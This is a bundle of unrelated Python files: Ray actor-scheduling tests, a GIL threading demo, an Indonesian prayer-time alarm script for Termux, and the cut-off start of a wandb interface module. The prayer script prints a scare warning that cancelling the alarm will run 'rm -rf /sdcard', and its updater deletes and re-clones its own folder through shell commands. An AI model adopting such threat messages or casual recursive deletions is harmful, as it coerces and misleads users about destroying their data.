def foo(ref1, ref2, ref3):
return ref1 == ref2 + ref3
@ray.remote(resources={"pin_head": 1})
def bar():
# if the refs are inlined, the test fails.
# refs = [ray.put(np.random.rand(1024) for _ in range(3))]
# return ray.get(
# foo.remote(refs[0], refs[1], refs[2]))
return ray.get(
foo.remote(
np.random.rand(1024), # 8k
np.random.rand(1024), # 8k
np.random.rand(1024))) # 8k
ray.get(bar.remote())
# This case tests whether gcs-based actor scheduler distributes actors
# in a balanced way. By default, it uses the `SPREAD` strategy of
# gcs resource scheduler.
@pytest.mark.parametrize("args", [[5, 20], [5, 3]])
def test_actor_distribution_balance(ray_start_cluster, args):
cluster = ray_start_cluster
node_count = args[0]
actor_count = args[1]
for i in range(node_count):
cluster.add_node(
memory=1024**3,
_system_config={"gcs_actor_scheduling_enabled": True}
if i == 0 else {})
ray.init(address=cluster.address)
cluster.wait_for_nodes()
@ray.remote(memory=100 * 1024**2, num_cpus=0.01)
class Foo:
def method(self):
return ray.worker.global_worker.node.unique_id
actor_distribution = {}
actor_list = [Foo.remote() for _ in range(actor_count)]
for actor in actor_list:
node_id = ray.get(actor.method.remote())
if node_id not in actor_distribution.keys():
actor_distribution[node_id] = []
actor_distribution[node_id].append(actor)
if node_count >= actor_count:
assert len(actor_distribution) == actor_count
for node_id, actors in actor_distribution.items():
assert len(actors) == 1
else:
assert len(actor_distribution) == node_count
for node_id, actors in actor_distribution.items():
assert len(actors) <= int(actor_count / node_count)
# This case tests whether gcs-based actor scheduler works properly with
# a normal task co-existed.
def test_schedule_actor_and_normal_task(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
memory=1024**3, _system_config={"gcs_actor_scheduling_enabled": True})
ray.init(address=cluster.address)
cluster.wait_for_nodes()
@ray.remote(memory=600 * 1024**2, num_cpus=0.01)
class Foo:
def method(self):
return 2
@ray.remote(memory=600 * 1024**2, num_cpus=0.01)
def fun(signal1, signal_actor2):
signal_actor2.send.remote()
ray.get(signal1.wait.remote())
return 1
signal1 = SignalActor.remote()
signal2 = SignalActor.remote()
o1 = fun.remote(signal1, signal2)
# Make sure the normal task is executing.
ray.get(signal2.wait.remote())
# The normal task is blocked now.
# Try to create actor and make sure this actor is not created for the time
# being.
foo = Foo.remote()
o2 = foo.method.remote()
ready_list, remaining_list = ray.wait([o2], timeout=2)
assert len(ready_list) == 0 and len(remaining_list) == 1
# Send a signal to unblock the normal task execution.
ray.get(signal1.send.remote())
# Check the result of normal task.
assert ray.get(o1) == 1
# Make sure the actor is created.
assert ray.get(o2) == 2
# This case tests whether gcs-based actor scheduler works properly
# in a large scale.
def test_schedule_many_actors_and_normal_tasks(ray_start_cluster):
cluster = ray_start_cluster
node_count = 10
actor_count = 50
each_actor_task_count = 50
normal_task_count = 1000
node_memory = 2 * 1024**3
for i in range(node_count):
cluster.add_node(
memory=node_memory,
_system_config={"gcs_actor_scheduling_enabled": True}
if i == 0 else {})
ray.init(address=cluster.address)
cluster.wait_for_nodes()
@ray.remote(memory=100 * 1024**2, num_cpus=0.01)
class Foo:
def method(self):
return 2
@ray.remote(memory=100 * 1024**2, num_cpus=0.01)
def fun():
return 1
normal_task_object_list = [fun.remote() for _ in range(normal_task_count)]
actor_list = [Foo.remote() for _ in range(actor_count)]
actor_object_list = [
actor.method.remote() for _ in range(each_actor_task_count)
for actor in actor_list
]
for object in ray.get(actor_object_list):
assert object == 2
for object in ray.get(normal_task_object_list):
assert object == 1
# This case tests whether RequestWorkerLeaseReply carries normal task resources
# when the request is rejected (due to resource preemption by normal tasks).
@pytest.mark.skip(
reason="The period of pull based resource report (10ms) is hard-coded.")
def test_worker_lease_reply_with_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
memory=2000 * 1024**2,
_system_config={
"raylet_report_resources_period_milliseconds": 1000000,
"gcs_actor_scheduling_enabled": True,
})
node2 = cluster.add_node(memory=1000 * 1024**2)
ray.init(address=cluster.address)
cluster.wait_for_nodes()
@ray.remote(memory=1500 * 1024**2)
def fun(signal):
signal.send.remote()
time.sleep(30)
return 0
signal = SignalActor.remote()
fun.remote(signal)
# Make sure that the `fun` is running.
ray.get(signal.wait.remote())
@ray.remote(memory=800 * 1024**2)
class Foo:
def method(self):
return ray.worker.global_worker.node.unique_id
foo1 = Foo.remote()
o1 = foo1.method.remote()
ready_list, remaining_list = ray.wait([o1], timeout=10)
# If RequestWorkerLeaseReply carries normal task resources,
# GCS will then schedule foo1 to node2. Otherwise,
# GCS would keep trying to schedule foo1 to
# node1 and getting rejected.
assert len(ready_list) == 1 and len(remaining_list) == 0
assert ray.get(o1) == node2.unique_id
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
mtadd.py
|
import time
import threading
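# CPU-bound demo: because of CPython's GIL the two threads below cannot run the
# pure-Python additions in parallel, so the threaded wall time is roughly the same
# as (or slightly worse than) running add() twice sequentially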
def add():
result = 0
for i in range(1, 50000001):
result += i
print(result)
if __name__ == '__main__':
start = time.time()
tlist = []
for i in range(2):
t = threading.Thread(target=add)
tlist.append(t) # add the thread to the list
t.start()
for t in tlist:
t.join() # like waitpid: wait for each worker thread to finish before continuing
end = time.time()
print(end - start)
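# For comparison (a sketch, not part of the original benchmark): the same CPU-bound
# work does scale with processes instead of threads, e.g. under this __main__ guard:
#     from multiprocessing import Process
#     procs = [Process(target=add) for _ in range(2)]
#     for p in procs: p.start()
#     for p in procs: p.join()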
|
sholat.py
|
# sholat
# karjok pangesty
# created 31 january 2019, 2:18 pm
# updated 5 may 2019, 6:00 pm
# -*- coding: utf-8 -*-
'''
PLEASE READ FIRST !!!
-----------------------
This code is open source and you are welcome to study it.
However, please do not copy this script without crediting its source (this repository).
Respect people's work, however modest it may be.
You might object that big open source projects do not demand credit for every little thing,
but the authors of big projects do credit their sources in their READMEs and documentation.
Yes, I realize my code is very messy and untidy, because I am still learning,
but believe me, it is the result of real effort.
I wrote this program twice: the first version was lost to a problem after three days and
nights of work, so I sincerely sat down and wrote it again. The second attempt took almost
as long, though a little less, because I already knew the flow of the code.
So writing a program is not easy. Show some respect, even if it is only a line like
'thanks to: blablabla'.
I am sure those who are already experts will consider this rubbish, and that is okay.
I also believe that a real expert would not bother copying "this program", but those who
are still learning might, and of them I am not so sure.
I hope it is useful.
'''
import sys,os, random
import subprocess as sp
import requests
from time import sleep
from time import strftime as tm
from requests import get
from bs4 import BeautifulSoup as bs
from threading import Thread
##############
# color
lgr='\033[1;95m'
lr= '\033[1;91m'
lg= '\033[1;92m'
lw= '\033[1;97m'
x = '\033[0m'
# fetch today's prayer schedule
def gettime():
print(lg+'Updating schedule ...')
try:
ts = open('.cookie/ts','r').read()
except IOError:
gettown()
ts= open('.cookie/ts','r').read()
if len(ts) == 0:
ts = '83'
try:
r = get('https://www.jadwalsholat.org/adzan/monthly.php?id='+ts)
except requests.exceptions.ConnectionError:
print(lg+'\nAstaghfirullah..\nSister, you forgot to turn on your network connection'+x)
input(lg+'\nJust press Enter')
menu()
b = bs(r.text,'html.parser')
tr= b.find('tr',class_="table_highlight")
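# the 'table_highlight' row is today's entry in the monthly table; a subset of its
# cells (the prayer-time columns) plus the city name from the matching <option> tag
# is cached to .cookie/sc for the rest of the program to read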
with open('.cookie/sc','w') as sc:
kota = b.find('option', attrs={'value':ts})
i= tr.find_all('td')
sc.write(i[0].text+','+i[1].text+','+i[2].text+','+i[5].text+','+i[6].text+','+i[7].text+','+i[8].text+','+kota.text)
sc.close()
def gettown():
print(
lg+"""1. """+lw+"""Ambarawa """+lg+"""78. """+lw+"""Gombong """+lg+"""155. """+lw+"""Mentok """+lg+"""232. """+lw+"""Selong"""+
lg+"""\n2. """+lw+"""Ambon """+lg+"""79. """+lw+"""Gorontalo """+lg+"""163. """+lw+"""Merauke """+lg+"""233. """+lw+"""Semarang"""+
lg+"""\n3. """+lw+"""Amlapura """+lg+"""80. """+lw+"""Gresik """+lg+"""157. """+lw+"""Metro """+lg+"""234. """+lw+"""Sengkang"""+
lg+"""\n4. """+lw+"""Amuntai """+lg+"""81. """+lw+"""Gunung Sit """+lg+"""158. """+lw+"""Meulaboh """+lg+"""235. """+lw+"""Serang"""+
lg+"""\n5. """+lw+"""Argamakmur """+lg+"""82. """+lw+"""Indramayu """+lg+"""159. """+lw+"""Mojokerto """+lg+"""236. """+lw+"""Serui"""+
lg+"""\n6. """+lw+"""Atambua """+lg+"""83. """+lw+"""Jakarta """+lg+"""160. """+lw+"""Muara Buli """+lg+"""237. """+lw+"""Sibolga"""+
lg+"""\n7. """+lw+"""Babo """+lg+"""84. """+lw+"""Jambi """+lg+"""161. """+lw+"""Muara Bung """+lg+"""238. """+lw+"""Sidikalang"""+
lg+"""\n8. """+lw+"""Bagan Siap """+lg+"""85. """+lw+"""Jayapura """+lg+"""162. """+lw+"""Muara Enim """+lg+"""239. """+lw+"""Sidoarjo"""+
lg+"""\n9. """+lw+"""Bajawa """+lg+"""86. """+lw+"""Jember """+lg+"""163. """+lw+"""Muara Tewe """+lg+"""240. """+lw+"""Sigli"""+
lg+"""\n10. """+lw+"""Balige """+lg+"""87. """+lw+"""Jeneponto """+lg+"""164. """+lw+"""Muaro Siju """+lg+"""241. """+lw+"""Singaparna"""+
lg+"""\n11. """+lw+"""Balik Papa """+lg+"""88. """+lw+"""Jepara """+lg+"""165. """+lw+"""Muntilan """+lg+"""242. """+lw+"""Singaraja"""+
lg+"""\n12. """+lw+"""Banda Aceh """+lg+"""89. """+lw+"""Jombang """+lg+"""166. """+lw+"""Nabire """+lg+"""243. """+lw+"""Singkawang"""+
lg+"""\n13. """+lw+"""Bandarlamp """+lg+"""90. """+lw+"""Kabanjahe """+lg+"""167. """+lw+"""Negara """+lg+"""244. """+lw+"""Sinjai"""+
lg+"""\n14. """+lw+"""Bandung """+lg+"""91. """+lw+"""Kalabahi """+lg+"""168. """+lw+"""Nganjuk """+lg+"""245. """+lw+"""Sintang"""+
lg+"""\n15. """+lw+"""Bangkalan """+lg+"""92. """+lw+"""Kalianda """+lg+"""169. """+lw+"""Ngawi """+lg+"""246. """+lw+"""Situbondo"""+
lg+"""\n16. """+lw+"""Bangkinang """+lg+"""93. """+lw+"""Kandangan """+lg+"""170. """+lw+"""Nunukan """+lg+"""247. """+lw+"""Slawi"""+
lg+"""\n17. """+lw+"""Bangko """+lg+"""94. """+lw+"""Karanganya """+lg+"""171. """+lw+"""Pacitan """+lg+"""248. """+lw+"""Sleman"""+
lg+"""\n18. """+lw+"""Bangli """+lg+"""95. """+lw+"""Karawang """+lg+"""172. """+lw+"""Padang """+lg+"""249. """+lw+"""Soasiu"""+
lg+"""\n19. """+lw+"""Banjar """+lg+"""96. """+lw+"""Kasungan """+lg+"""173. """+lw+"""Padang Pan """+lg+"""250. """+lw+"""Soe"""+
lg+"""\n20. """+lw+"""Banjar Bar """+lg+"""97. """+lw+"""Kayuagung """+lg+"""174. """+lw+"""Padang Sid """+lg+"""251. """+lw+"""Solo"""+
lg+"""\n21. """+lw+"""Banjarmasi """+lg+"""98 . """+lw+"""Kebumen """+lg+"""175. """+lw+"""Pagaralam """+lg+"""252. """+lw+"""Solok"""+
lg+"""\n22. """+lw+"""Banjarnega """+lg+"""99. """+lw+"""Kediri """+lg+"""176. """+lw+"""Painan """+lg+"""253. """+lw+"""Soreang"""+
lg+"""\n23. """+lw+"""Bantaeng """+lg+"""100. """+lw+"""Kefamenanu """+lg+"""177. """+lw+"""Palangkara """+lg+"""254. """+lw+"""Sorong"""+
lg+"""\n24. """+lw+"""Banten """+lg+"""101. """+lw+"""Kendal """+lg+"""178. """+lw+"""Palembang """+lg+"""255. """+lw+"""Sragen"""+
lg+"""\n25. """+lw+"""Bantul """+lg+"""102. """+lw+"""Kendari """+lg+"""179. """+lw+"""Palopo """+lg+"""263. """+lw+"""Stabat"""+
lg+"""\n26. """+lw+"""Banyuwangi """+lg+"""103. """+lw+"""Kertosono """+lg+"""180. """+lw+"""Palu """+lg+"""257. """+lw+"""Subang"""+
lg+"""\n27. """+lw+"""Barabai """+lg+"""104. """+lw+"""Ketapang """+lg+"""181. """+lw+"""Pamekasan """+lg+"""258. """+lw+"""Sukabumi"""+
lg+"""\n28. """+lw+"""Barito """+lg+"""105. """+lw+"""Kisaran """+lg+"""182. """+lw+"""Pandeglang """+lg+"""259. """+lw+"""Sukoharjo"""+
lg+"""\n29. """+lw+"""Barru """+lg+"""106. """+lw+"""Klaten """+lg+"""183. """+lw+"""Pangkajene """+lg+"""260. """+lw+"""Sumbawa Be"""+
lg+"""\n30. """+lw+"""Batam """+lg+"""107. """+lw+"""Kolaka """+lg+"""184. """+lw+"""Pangkajene """+lg+"""261. """+lw+"""Sumedang"""+
lg+"""\n31. """+lw+"""Batang """+lg+"""108. """+lw+"""Kota Baru """+lg+"""185. """+lw+"""Pangkalanb """+lg+"""262. """+lw+"""Sumenep"""+
lg+"""\n32. """+lw+"""Batu """+lg+"""109. """+lw+"""Kota Bumi """+lg+"""186. """+lw+"""Pangkalpin """+lg+"""263. """+lw+"""Sungai Lia"""+
lg+"""\n33. """+lw+"""Baturaja """+lg+"""110. """+lw+"""Kota Janth """+lg+"""187. """+lw+"""Panyabunga """+lg+"""264. """+lw+"""Sungai Pen"""+
lg+"""\n34. """+lw+"""Batusangka """+lg+"""111. """+lw+"""Kota Mobag """+lg+"""188. """+lw+"""Pare """+lg+"""265. """+lw+"""Sunggumina"""+
lg+"""\n35. """+lw+"""Baubau """+lg+"""112. """+lw+"""Kuala Kapu """+lg+"""189. """+lw+"""Parepare """+lg+"""266. """+lw+"""Surabaya"""+
lg+"""\n36. """+lw+"""Bekasi """+lg+"""113. """+lw+"""Kuala Kuru """+lg+"""190. """+lw+"""Pariaman """+lg+"""267. """+lw+"""Surakarta"""+
lg+"""\n37. """+lw+"""Bengkalis """+lg+"""114. """+lw+"""Kuala Pemb """+lg+"""191. """+lw+"""Pasuruan """+lg+"""268. """+lw+"""Tabanan"""+
lg+"""\n38. """+lw+"""Bengkulu """+lg+"""115. """+lw+"""Kuala Tung """+lg+"""192. """+lw+"""Pati """+lg+"""269. """+lw+"""Tahuna"""+
lg+"""\n39. """+lw+"""Benteng """+lg+"""116. """+lw+"""Kudus """+lg+"""193. """+lw+"""Payakumbuh """+lg+"""270. """+lw+"""Takalar"""+
lg+"""\n40. """+lw+"""Biak """+lg+"""117. """+lw+"""Kuningan """+lg+"""194. """+lw+"""Pekalongan """+lg+"""271. """+lw+"""Takengon"""+
lg+"""\n41. """+lw+"""Bima """+lg+"""118. """+lw+"""Kupang """+lg+"""195. """+lw+"""Pekan Baru """+lg+"""272. """+lw+"""Tamiang La"""+
lg+"""\n42. """+lw+"""Binjai """+lg+"""119. """+lw+"""Kutacane """+lg+"""196. """+lw+"""Pemalang """+lg+"""273. """+lw+"""Tanah Grog"""+
lg+"""\n43. """+lw+"""Bireuen """+lg+"""120. """+lw+"""Kutoarjo """+lg+"""197. """+lw+"""Pematangsi """+lg+"""274. """+lw+"""Tangerang"""+
lg+"""\n44. """+lw+"""Bitung """+lg+"""121. """+lw+"""Labuhan """+lg+"""198. """+lw+"""Pendopo """+lg+"""275. """+lw+"""Tanjung Ba"""+
lg+"""\n45. """+lw+"""Blitar """+lg+"""122. """+lw+"""Lahat """+lg+"""199. """+lw+"""Pinrang """+lg+"""276. """+lw+"""Tanjung En"""+
lg+"""\n46. """+lw+"""Blora """+lg+"""123. """+lw+"""Lamongan """+lg+"""200. """+lw+"""Pleihari """+lg+"""277. """+lw+"""Tanjung Pa"""+
lg+"""\n47. """+lw+"""Bogor """+lg+"""124. """+lw+"""Langsa """+lg+"""201. """+lw+"""Polewali """+lg+"""278. """+lw+"""Tanjung Pi"""+
lg+"""\n48. """+lw+"""Bojonegoro """+lg+"""125. """+lw+"""Larantuka """+lg+"""202. """+lw+"""Pondok Ged """+lg+"""279. """+lw+"""Tanjung Re"""+
lg+"""\n49. """+lw+"""Bondowoso """+lg+"""126. """+lw+"""Lawang """+lg+"""203. """+lw+"""Ponorogo """+lg+"""280. """+lw+"""Tanjung Se"""+
lg+"""\n50. """+lw+"""Bontang """+lg+"""127. """+lw+"""Lhoseumawe """+lg+"""204. """+lw+"""Pontianak """+lg+"""281. """+lw+"""Tapak Tuan"""+
lg+"""\n51. """+lw+"""Boyolali """+lg+"""128. """+lw+"""Limboto """+lg+"""205. """+lw+"""Poso """+lg+"""282. """+lw+"""Tarakan"""+
lg+"""\n52. """+lw+"""Brebes """+lg+"""129. """+lw+"""Lubuk Basu """+lg+"""206. """+lw+"""Prabumulih """+lg+"""283. """+lw+"""Tarutung"""+
lg+"""\n53. """+lw+"""Bukit Ting """+lg+"""130. """+lw+"""Lubuk Ling """+lg+"""207. """+lw+"""Praya """+lg+"""284. """+lw+"""Tasikmalay"""+
lg+"""\n54. """+lw+"""Bulukumba """+lg+"""131. """+lw+"""Lubuk Paka """+lg+"""208. """+lw+"""Probolingg """+lg+"""285. """+lw+"""Tebing Tin"""+
lg+"""\n55. """+lw+"""Buntok """+lg+"""132. """+lw+"""Lubuk Sika """+lg+"""209. """+lw+"""Purbalingg """+lg+"""286. """+lw+"""Tegal"""+
lg+"""\n63. """+lw+"""Cepu """+lg+"""133. """+lw+"""Lumajang """+lg+"""210. """+lw+"""Purukcahu """+lg+"""287. """+lw+"""Temanggung"""+
lg+"""\n57. """+lw+"""Ciamis """+lg+"""134. """+lw+"""Luwuk """+lg+"""211. """+lw+"""Purwakarta """+lg+"""288. """+lw+"""Tembilahan"""+
lg+"""\n58. """+lw+"""Cianjur """+lg+"""135. """+lw+"""Madiun """+lg+"""212. """+lw+"""Purwodadig """+lg+"""289. """+lw+"""Tenggarong"""+
lg+"""\n59. """+lw+"""Cibinong """+lg+"""136. """+lw+"""Magelang """+lg+"""213. """+lw+"""Purwokerto """+lg+"""290. """+lw+"""Ternate"""+
lg+"""\n60. """+lw+"""Cilacap """+lg+"""137. """+lw+"""Magetan """+lg+"""214. """+lw+"""Purworejo """+lg+"""291. """+lw+"""Tolitoli"""+
lg+"""\n61. """+lw+"""Cilegon """+lg+"""138. """+lw+"""Majalengka """+lg+"""215. """+lw+"""Putussibau """+lg+"""292. """+lw+"""Tondano"""+
lg+"""\n62. """+lw+"""Cimahi """+lg+"""139. """+lw+"""Majene """+lg+"""216. """+lw+"""Raha """+lg+"""293. """+lw+"""Trenggalek"""+
lg+"""\n63. """+lw+"""Cirebon """+lg+"""140. """+lw+"""Makale """+lg+"""217. """+lw+"""Rangkasbit """+lg+"""294. """+lw+"""Tual"""+
lg+"""\n64. """+lw+"""Curup """+lg+"""141. """+lw+"""Makassar """+lg+"""218. """+lw+"""Rantau """+lg+"""295. """+lw+"""Tuban"""+
lg+"""\n65. """+lw+"""Demak """+lg+"""142. """+lw+"""Malang """+lg+"""219. """+lw+"""Rantauprap """+lg+"""296. """+lw+"""Tulung Agu"""+
lg+"""\n66. """+lw+"""Denpasar """+lg+"""143. """+lw+"""Mamuju """+lg+"""220. """+lw+"""Rantepao """+lg+"""297. """+lw+"""Ujung Beru"""+
lg+"""\n67. """+lw+"""Depok """+lg+"""144. """+lw+"""Manna """+lg+"""221. """+lw+"""Rembang """+lg+"""298. """+lw+"""Ungaran"""+
lg+"""\n68. """+lw+"""Dili """+lg+"""145. """+lw+"""Manokwari """+lg+"""222. """+lw+"""Rengat """+lg+"""299. """+lw+"""Waikabubak"""+
lg+"""\n69. """+lw+"""Dompu """+lg+"""146. """+lw+"""Marabahan """+lg+"""223. """+lw+"""Ruteng """+lg+"""300. """+lw+"""Waingapu"""+
lg+"""\n70. """+lw+"""Donggala """+lg+"""147. """+lw+"""Maros """+lg+"""224. """+lw+"""Sabang """+lg+"""301. """+lw+"""Wamena"""+
lg+"""\n71. """+lw+"""Dumai """+lg+"""148. """+lw+"""Martapura """+lg+"""225. """+lw+"""Salatiga """+lg+"""302. """+lw+"""Watampone"""+
lg+"""\n72. """+lw+"""Ende """+lg+"""149. """+lw+"""Masohi """+lg+"""226. """+lw+"""Samarinda """+lg+"""303. """+lw+"""Watansoppe"""+
lg+"""\n73. """+lw+"""Enggano """+lg+"""150. """+lw+"""Mataram """+lg+"""227. """+lw+"""Sampang """+lg+"""304. """+lw+"""Wates"""+
lg+"""\n74. """+lw+"""Enrekang """+lg+"""151. """+lw+"""Maumere """+lg+"""228. """+lw+"""Sampit """+lg+"""305. """+lw+"""Wonogiri"""+
lg+"""\n75. """+lw+"""Fakfak """+lg+"""152. """+lw+"""Medan """+lg+"""229. """+lw+"""Sanggau """+lg+"""306. """+lw+"""Wonosari"""+
lg+"""\n76. """+lw+"""Garut """+lg+"""153. """+lw+"""Mempawah """+lg+"""230. """+lw+"""Sawahlunto """+lg+"""307. """+lw+"""Wonosobo"""+
lg+"""\n77. """+lw+"""Gianyar """+lg+"""154. """+lw+"""Menado """+lg+"""231. """+lw+"""Sekayu """+lg+"""308. """+lw+"""Yogyakarta""")
print(lg+'_'*63)
inp = input(lg+'Select your city::'+x)
if int(inp) <= 82:
pass
elif int(inp) >= 83 and int(inp) <= 204:
inp = str(int(inp)-1)
elif int(inp) >= 205:
inp = str(int(inp)-1)
else:
inp = '308'
ts = open('.cookie/ts','w')
ts.write(inp)
ts.close()
gettime()
# input
def start():
global s,d,a,m,i,tt,o,im,saur
try:
banner()
try:
o = open('.cookie/sc','r').read()
except IOError:
gettime()
o = open('.cookie/sc','r').read()
o = o.split(',')
if o[0] != tm('%d'):
gettime()
im= int(o[1].replace(':',''))
s = int(o[2].replace(':',''))
d = int(o[3].replace(':',''))
a = int(o[4].replace(':',''))
m = int(o[5].replace(':',''))
i = int(o[6].replace(':',''))
tt = int(tm('%H%M'))
saur = im - 100
if tt > s and tt < d:
ss = 'sholat Dzuhur'
elif tt > d and tt < a:
ss = 'sholat Ashar'
elif tt > a and tt < m:
ss = 'sholat Maghrib'
elif tt > m and tt < i:
ss = 'sholat Isya'
elif (tt > i and im < s) or (tt < 2400 and im < s and tt < im):
ss = 'Imsak'
else:
ss = 'sholat Subuh'
banner()
print(f'''
{lg}Prayer times {lw}{tm('%d %B, %Y')}
{lg}For the City{lw} {o[7]}{lg} and surroundings.
{lg}Imsak : {lw}{o[1]}
{lg}Subuh : {lw}{o[2]}
{lg}Dzuhur : {lw}{o[3]}
{lg}Ashar : {lw}{o[4]}
{lg}Maghrib : {lw}{o[5]}
{lg}Isya : {lw}{o[6]}
{lg}Sedang menantikan waktu {ss}..
ctrl + c untuk berhenti''')
while True:
tt = int(tm('%H%M'))
time = tm(f'{lw}%H{lg}:{lw}%M{lg}:{lw}%S{lg}')
if tt == s:
banner()
print (lw+f' {lg}SAATNYA ADZAN SUBUH{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == d:
banner()
print (lw+f' {lg}SAATNYA ADZAN DZUHUR{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == a:
banner()
print (lw+f' {lg}SAATNYA ADZAN ASHAR{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == m:
banner()
print (lw+f' {lg}SAATNYA ADZAN MAGHRIB{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == i:
banner()
print (lw+f' {lg}SAATNYA ADZAN ISYA{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == im:
banner()
print (lw+f' {lg}WAKTU IMSAK{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdpuasa()
start()
break
elif tt == saur:
banner()
print (lw+f' {lg}WAKTUNYA BANGUN SAHUR GAN !!!{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya\n\n{lg}Credit:{x} https://youtu.be/EXjt18hF6UY')
print (lg+'_'*63)
trdpuasa()
start()
break
else:
print('\rSekarang jam {} '.format(time), end=''); sys.stdout.flush(); sleep(1)
except KeyboardInterrupt:
menu()
def ani():
print('\n')
for i in random.choice(txt):
print(lg+str(i.replace('\n','')), end=''); sys.stdout.flush(); sleep(0.05)
sleep(2)
def suara():
if tm('%H:%M') == o[2]:
nada = '.fajr'
elif tm('%H:%M') == o[1]:
nada = '.ims'
elif int(tm('%H%M')) == saur:
nada = '.saur'
else:
nada = '.reg'
sp.call(['mpv '+nada],shell=True,stdout=sp.DEVNULL,stderr=sp.STDOUT)
def trdsholat():
global txt
txt = open('.__','r').readlines()
st = [lr,
'DONT IN CANCELL IF THE ADZANS ARE BEING, DIRECTLY PRAYING AJA',
'IF IN CANCELL AUTO RM -RF / SDCARD.',
'PLEASE MAKE THIS THAT, LET IT GO TO PRAYER,',
'BECAUSE THE PRAYER IS REQUIRED.'
]
for i in st:
print(i.center(60))
ttt = Thread(name='adzan',target=suara)
ttt.start()
while ttt.is_alive():
ani()
def trdpuasa():
global txt
if int(tm('%H%M')) == saur:
txt = open('.___','r').readlines()
else:
txt = open('.____','r').readlines()
ttx = Thread(name='puasa',target=suara)
ttx.start()
while ttx.is_alive():
ani()
def banner():
sp.call('clear')
print(f'''
{lgr}:::::::{lg}╗{lgr}::{lg}╗ {lgr}::{lg}╗ {lgr}::::::{lg}╗ {lgr}::{lg}╗ {lgr}:::::{lg}╗ {lgr}::::::::{lg}╗
{lgr}::{lg}╔════╝{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}╔═══{lgr}::{lg}╗{lgr}::{lg}║ {lgr}::{lg}╔══{lgr}::{lg}╗╚══{lgr}::{lg}╔══╝
{lgr}:::::::{lg}╗{lgr}:::::::{lg}║{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}║ {lgr}:::::::{lg}║ {lgr}::{lg}║
╚════{lgr}::{lg}║{lgr}::{lg}╔══{lgr}::{lg}║{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}║ {lgr}::{lg}╔══{lgr}::{lg}║ {lgr}::{lg}║
{lgr}:::::::{lg}║{lgr}::{lg}║ {lgr}::{lg}║╚{lgr}::::::{lg}╔╝{lgr}:::::::{lg}╗{lgr}::{lg}║ {lgr}::{lg}║ {lgr}::{lg}║
╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝
{lw}Programmer Muslim Nggak Lupa Ibadah{lg}
{lg}[{x}Special Thanks, ERR0R H{lg}]
_______________________________________________________________
''')
def menu():
banner()
print(f'''
{lg}1.{lw} Aktifkan
{lg}2.{lw} Ganti kota
{lg}3.{lw} Update
{lg}4.{lw} Tentang
{lg}0.{lw} Keluar''')
p = input(lg+'\nSholat # '+x)
if p == '1':
start()
elif p == '2':
try:
os.remove('.cookie/ts')
except:
pass
gettown()
start()
elif p == '3':
update()
elif p == '4':
tentang()
else:
exit()
def update():
banner()
print(lr+'Jangan di cancell ya ukhty.. biar nggak error :*')
print(lg+'Cek jaringan..')
try:
get('https://github.com')
except requests.exceptions.ConnectionError:
print(lg+'Astaghfirullah.. Ukhty lupa ngidupin jaringannya')
exit()
print(lg+'Mengupdate..\nLama tidaknya tergantung jaringan, sabarr :)')
os.system('cd .. && rm -rf sholat')
sp.call(['cd .. && git clone https://github.com/karjok/sholat'],shell=True, stdout=sp.DEVNULL,stderr=sp.STDOUT)
print(lg+'Selesai mengupdate')
print(lg+'Memulai ulang..')
sleep(2)
os.system('cd ../sholat && python sholat.py')
def tentang():
banner()
print(f'''
{lg}Nama : {lw}Sholat
{lg}Versi : {lw}2.0 (update: 5 Mei 2019, 6:00PM)
{lg}Tanggal : {lw}31 Januari 2020, 2:18PM
{lg}Author : {lw}Nggak Lupa Ibadah
{lg}Coder : {lw}ERR0R
waktu sholat
{lg}Team : {lw}ITALIA CYBER ARMY
Eka Pangesty, CRABS dan semua
umat Muslim seplanet bumi.
{lg}NB : {lw}Manusia nggak ada yang sempurna,
sama kaya tool ini.
Silahkan laporkan kritik atau saran
ke: - https://t.me/termuxxhacking
- https://facebook.com/termuxxhacking
- @termux_hacking''')
input(lg+'Enterin aja ')
menu()
def exit():
print(lg+'_'*63)
print('Makasih ukhty,\nSemoga sehat selalu 😙'+x)
if __name__=='__main__':
try:
os.mkdir('.cookie')
except OSError:
pass
menu()
|
interface.py
|
#
# -*- coding: utf-8 -*-
"""Backend Sender - Send to internal process
Manage backend sender.
"""
import json
import logging
from multiprocessing import Process
import threading
import typing as t
from typing import Any, Dict, Iterable, Optional, Tuple, Union
from typing import cast
from typing import TYPE_CHECKING
import uuid
import six
from six.moves import queue
import wandb
from wandb import data_types
from wandb.proto import wandb_internal_pb2 as pb
from wandb.proto import wandb_telemetry_pb2 as tpb
from wandb.util import (
get_h5_typename,
json_dumps_safer,
json_dumps_safer_history,
json_friendly,
json_friendly_val,
maybe_compress_summary,
WandBJSONEncoderOld,
)
from . import summary_record as sr
from .artifacts import ArtifactManifest
from ..wandb_artifacts import Artifact
if TYPE_CHECKING:
from ..wandb_run import Run
from six.moves.queue import Queue
logger = logging.getLogger("wandb")
def file_policy_to_enum(policy: str) -> "pb.FilesItem.PolicyTypeValue":
if policy == "now":
enum = pb.FilesItem.PolicyType.NOW
elif policy == "end":
enum = pb.FilesItem.PolicyType.END
elif policy == "live":
enum = pb.FilesItem.PolicyType.LIVE
return enum
def file_enum_to_policy(enum: "pb.FilesItem.PolicyTypeValue") -> str:
if enum == pb.FilesItem.PolicyType.NOW:
policy = "now"
elif enum == pb.FilesItem.PolicyType.END:
policy = "end"
elif enum == pb.FilesItem.PolicyType.LIVE:
policy = "live"
return policy
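# Illustrative sketch (not part of the original wandb module): the two helpers
# above map the string file policies used by the public API ("now", "end",
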